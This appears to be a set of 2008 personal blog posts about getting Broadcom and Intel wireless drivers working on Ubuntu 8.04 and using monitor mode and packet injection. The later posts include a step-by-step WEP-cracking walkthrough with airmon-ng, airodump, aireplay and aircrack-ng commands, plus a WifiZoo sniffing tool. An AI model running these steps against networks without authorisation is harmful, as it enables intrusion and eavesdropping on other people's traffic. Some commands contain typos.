Hardy Heron - B43 Broadcom Driver Setup on fresh install

Well, this is my first time fresh installing Ubuntu 8.04 Hardy Heron on my Laptop. Before this, I used to upgrade my system from Gutsy to Hardy using update-manager. And without any problem, I got the wireless(which in hardy using b43 instead of bcm43xx) working without any need to do anything. Which mean, Upgrade --> Reboot --> And wireless is there and it's B43~!

But in another situation, I just do a Hardy Heron fresh install yesterday, not much problem in the installation process, which I manage to boot into the new system in about 20-30 minutes of installation process. All working fine without any major issue but then i realized that my Broadcom Wireless(b43) didnt light up. So I assume that my broadcom didnt working on fresh install.

Here is simple step I make to make this things work:

sudo apt-get install b43-fwcutter

This command will install the fwcutter for latest b43 driver and load the firmware in installation process. Basically, Hardy suppose to include this things on installation, but somehow the b43-fwcutter sometimes doesnt work will all cards, so you really need to remove the default one and reinstall it back using above command. Hope this will help.

Wireless go into Monitor with Injection Support

I've been experimenting to use aircrack to test out Access Point(AP) security for about a month and a half now, and i used to do it with 3 wireless card that I own which is Broadcom(Built-in on my laptop), rt73usb(which is a USB wireless Device) and ZD1211rw(also a USB device).

Formerly, I have to patch my modules in order to make the cards to go into monitor mode so that it could be used with aircrack suite. All the hard work will paid out if you successfully patch your cards. But to find the right patch is the most hard part as not every patch is suitable with your chipset.

But, i notice somthing different on the latest linux kernel(maybe it might be working too on BSD's kernel), you dont have to patch your card to change your wireless mode into monitor-mode. But this is only tested on Mac80211 cards only. As far as I'm concern, b43(latest driver for broadcom), rt73usb and zd1211rw - all of this card happened to be mac80211 cards on kernel 2.6.24 and higher.

So al you need to do is install the iw application. So how to install 'iw'? It took a few steps to install 'iw'. But even a new linux user could install this without any problems. First all you have to do is install all the requirements needed by 'iw' in order to function.

sudo apt-get update && sudp apt-get install libnl-dev libnl1 libnl1-pre6

Then when all the requirements has been installed, we may proceed to gathering the 'iw' source:

mkdir iw && cd iw
wget http://gunblade.fakap.net/tool/wireless/iw.tar.bz2 && tar xvjf iw.tar.bz2

And now proceed to the final step:

make && sudo ln -s iw /usr/sbin/iw

And we are done. So now you may try to install the aircrack from SVN by using subversion. There is a simpe tutorial on how to install this latest version of aircrack from by using subversion. But first you need to install subversion first by apt. More tutorial on how to install aircrack is on my previous post.

Ubuntu: Hardy Problem with Wireless (b43,iwl3945, madwifi etc)

I have been helping one of my fellow Ubuntu user from my neighbours country - Indonesia regarding his problem with Intel 3945 wireless chipset on Hardy Heron. Well, to be honest Intel chipset doesnt have any problem on the previous version of Ubuntu 7.10(Gutsy Gibbon). But the problem arise as in Hardy, the driver have change from ipw3945 to iwl3945.

Some people will have/encounter problems to setting up the intel chipset in order to make it work properly. Well, from my experience dealing with the problem(on helping my friend), there is a simple solution to this problem. There are several ways to solve this problem. And it will work on other chipset too including b43, madwifi and etc.

So here is the step to configure Intel 3945 Chipset on Ubuntu 8.04 Hardy Heron:

1. Open up terminal
2. Code : sudo gedit /etc/modprobe.d/blacklist
3. Edit : Add at the end of the file "blacklist ipw3945" then save and exit. (You could use any text editor you like. I'm using gedit so that it could be more newbie friendly)
4. Then you need to edit the rules. Type : sudo gedit /etc/udev/rules.d/70-persistent-net.rules
5. Then delete all lines related to wifi interface. Leave only line which define eth0 which refering to your wired interface(ethernet). Then save and exit.
6. Now we need to remove the modules: sudo rmmode iwl3945
7. And add the modules back: sudo modprobe iwl3945
8. Now to check either the wifi is working do: ifconfig
9. If you see a device called 'wlan0' and 'wmaster0' then it means your wireless is working. Please check your network manager applet for access point signal. But please make sure you do have access point nearby if not you wont see any signal in network manager.

So that's it. If you are using bcm43xx formerly on Gutsy, then change the iwl3945 to b43. And you'll see what i mean. I hope this will be helpful. If any problem occur, please leave me a message either by comments or emails. Thanks

Your Access Point being sniff?

As I wondering just how easy someone could break into your protected WEP Access Point(dont use WEP), so i google more in order to look for other application that is fun to play with. And suddenly I stop at one page called WifiZoo.

What is it ?

Well - WifiZoo is tools to gather Wifi information from AP to client details. It could gather all the information about the bssid and eesid also the client connected to it. So to be simple, WifiZoo is quite similar to Airodump-ng. It could gather all sort of information and turn it into .cap files.

Right now, some of the folks on BackTrack currently developing the current wifizoo to intergrate with aircrack and working as info gathering. It'll be a great combination if this tools come in bundle with aircrack.

Capabillitites

Well this WifiZoo could well integrate with kismet to do channel hopping. Default wifizoo can't do channel hop but could easily do the hopping with kismet helps:

• run kismet
• run wifizoo
• wait - it'll work

It can also do channelhop, channelvelocity, channeldwell, defaultchannels and sourcechannels. You just have to edit configuration in kismet.

Requirements

• It need python
• It need scrappy
• and kismet if you want to do channel hopping.

So it's not secure anymore to use wireless connection to do online banking or even chat with your friends about any personal issue cause you will never know who's listening to your conversation.
Maybe next morning, you'll read your own conversation on the net as soon as you woke up.

UBUNTU: SVN aircrack version (1.0 Beta 2)

Sorry for the late follow up on my previous tutorial about aircrack. Life been busy with some programming work and also web designing at my practical company. So here is a quick guide on how to install new version of Aircrack 1.0 beta 2 for ubuntu users.

sudo apt-get install subversion
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

Now to install the aircrack:

cd aircrack-ng/trunks
make
sudo make install

So this will install the new aircrack to work with latest SuD patch. Some will have errors after applying SuD patch to run Aircrack 0.9.3 on ubuntu. So here is the solution.

As far as I've been using this, still got no problem with the patch nor the aircrack itself. Here is some review I post previously on running aircrack with bcm43xx.

So I assume that this SuD patch is a stable patch for bcm43xx running under Aircrack 1.0 beta 2. Thanks to SuD for the patch, and please leave a comments if any left out in steps given.

How to setup Edimax 7318USg

After do some research and lurking on every forum on the net, finally I come to one page which is I think the most suitable answer for those who have Edimax 7318USg card to make it able to do injection using "aireplay-ng".

Here is the solution:

• first install a new beta version of aircrack-ng from this site. [ Aircrack 1.0 beta 2 ]
• I assume you know how to compile the aircrack-ng from source since you are attempting to do the crack, if not then just delete the aircrack-ng source and go to google to read more on linux basic skills ~:P
• Then remove the current rt2500 or rt73 driver on your machine.
• Then install the adequate driver. [ rt73 adequate driver ]
  
• And this time i assume you do know how to install a driver. (extract, make, make install, modprobe)
  
• put the card in monitor mode by using "airmon-ng start [interface]"
• and play the aircracks

Suppose you are good to go with some packets capturing and injection. But if somehow you lost and cant figure out on how to remove the current driver, here is the way to cleanly remove old driver(cause sometime, default driver do interfere with the driver you install to inject):

• airdriver-ng remove 25
• airdriver-ng remove 31
• this will remove the current rt2500 and rt73 driver from your system.

So I hope this will make your card fully compatible with injection procedure. But there is some note to take.

Note:

• "aireplay-ng -1" wont work before you do "aireplay-ng -9"
• run aireplay-ng -9 -a [BSSID] -B rausb0 to get the valid rate for rausb0. When get the rate set it to your rausb0 by using "iwconfig rausb0 rate yMB" where 'y' is the rate receive earlier on aireplay.

This tutorial is especially dedicated to one of friends 'srand' on irc. Please give the result if you tried this method on your rausb0 card. I would like to know the result if any error occurs.

Patch for iwl4965 testing version

Hello, for those who like to test the aircrack, kismet or any other wifi cracking application need to turun card into monitor mode. As far as I know, iwl4965 is a new chip set from intel, and no patch yet on the net to enable iwl4965 to do packets injection.

So I google aroudn and found out, that there is someone able to do injections using iwl4965 wifi cards and luckily he share the patch for others to give it a try. For those who is interested on playing with Wireless AP, then you can download the patch for iwl4965 from patch iwl4965.

To apply the patch, just do "patch -i [patch filename]" and patch it on kernel source. After that, you need to recompile the modules and copy the new module into your current module directory in order the new patch to work.

more over, if you need some information on the patch, please read the forum discussion about iwl4965 injection here.

Aircrack-ng review on bcm43xx

This post took me 2 days to make it ready. So here is the exact way on how do i crack the WEP in just about 20 mins.

It took 3 steps to make it ready before we can crack the wireless. First you need to know is how does WEP works. You can read about WEP here. So to make it possible to crack using aircrack-ng for bcm43xx, you need to patch your card. I post earlier a how-to patch bcm43xx in this post.

So here is four steps:

• sudo airmon-ng [start|stop|check] [wireless interface] [channel]
  
• sudo airodump [interface] [option] -w [prefix for output file]
  
• sudo aireplay -1 0 -a [target mac] -h [your wireless mac] [interface]
• sudo aireplay -3 -b [target mac] -h [your wireless mac] [interface]

Now wait until airodump capture enough packets (around 1300000+ ) is just enough to crack wep key using aircrack. Once you have finished capturing ivs , now it is time to do the crack.

• sudo aircrack-ng [.cap files]

You can add more option depends on the wep key, for more info about option please refer to the manual page of the command.